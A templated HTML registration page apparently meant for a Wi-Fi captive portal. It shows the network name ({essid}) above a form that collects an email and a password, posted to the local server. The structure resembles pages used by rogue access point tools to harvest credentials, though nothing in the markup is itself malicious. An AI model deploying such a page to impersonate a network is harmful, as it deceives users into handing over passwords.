<!DOCTYPE html>
<html lang="{lang}">
  <head>
    <title>{signup}</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
      body {
        background-color: #4949ff;
        font-family: arial, sans-serif;
        text-align: center;
        color: #ffffff;
      }
      .register {
        display: inline-block;
        margin-top: 50px;
        max-width: 350px;
        width: 100%;
      }
      h1, h3 {
        margin-bottom: -10px;
      }
      input {
        width: 90%;
        height: 36px;
        padding-left: 10px;
        background-color: #ffffff;
        border: 0px;
        border-radius: 18px;
        margin-bottom: 10px;
      }
      input[type=submit] {
        cursor: pointer;
        margin-top: 20px;
        background-color: #2424d2;
        font-weight: bold;
        color: #ffffff;
      }
      input:focus {
        box-shadow: inset 0px 0px 6px 2px rgba(191,191,191,1);
        outline: none;
      }
      input[type=submit]:hover, input[type=submit]:active {
        box-shadow: 0px 0px 18px -5px rgba(0,0,0,0.75);
        outline: none;
      }
    </style>
  </head>
  <body>
    <div class="register">
      <h1>{essid}</h1>
      <h3>{description}</h3>
      <p>{info}</p>
      <form action="/" method="POST">
        <input type="text" id="s" name="s" value="s" hidden>
        <input type="email" id="email" name="email" placeholder="{email}" required>
        <input type="password" id="pass1" name="pass1" placeholder="{pass1}" minlength="6" required>
        <input type="password" id="pass2" name="pass2" placeholder="{pass2}" minlength="6" required>
        <input type="submit" value="{register}">
      </form>
    </div>
  </body>
</html>
